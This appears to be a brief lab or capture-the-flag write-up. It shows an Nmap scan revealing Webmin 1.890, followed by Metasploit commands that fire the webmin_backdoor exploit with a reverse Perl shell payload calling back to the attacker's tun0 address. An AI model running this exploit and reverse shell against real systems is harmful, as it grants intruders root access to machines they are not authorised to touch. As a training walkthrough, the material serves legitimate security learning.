First I ran a Nmap scan, from which we see that port 22 and 10000 is open. We also see that port 10000 runs some web service called Webmin.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b74cd0bde27b1b15722764562915ea23 (RSA)
| 256 b78523114f44fa22008e40775ecf287c (ECDSA)
|_ 256 a9fe4b82bf893459365becdac2d395ce (ED25519)
10000/tcp open http MiniServ 1.890 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-favicon: Unknown favicon MD5: 7B403D3D5C87B168EA5B8ADA089E342C
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
After looking through the webpage, which requires SSL (https), I search for known vulnerabilities in Webmin and found . Metasploit has an exploit for this one which makes things very easy. I configured as such and got imidiate root access.
I don't think that was the intended way of doing thinks, but it worked very well.
msf6 > use exploit/linux/http/webmin_backdoor
[*] Using configured payload cmd/unix/reverse_perl
msf6 exploit(linux/http/webmin_backdoor) > set rhost 10.10.186.27
rhost => 10.10.186.27
msf6 exploit(linux/http/webmin_backdoor) > set lhost tun0
lhost => NOTSHOWN
msf6 exploit(linux/http/webmin_backdoor) > set ssl true
[!] Changing the SSL option's value may require changing RPORT!
ssl => true
msf6 exploit(linux/http/webmin_backdoor) > run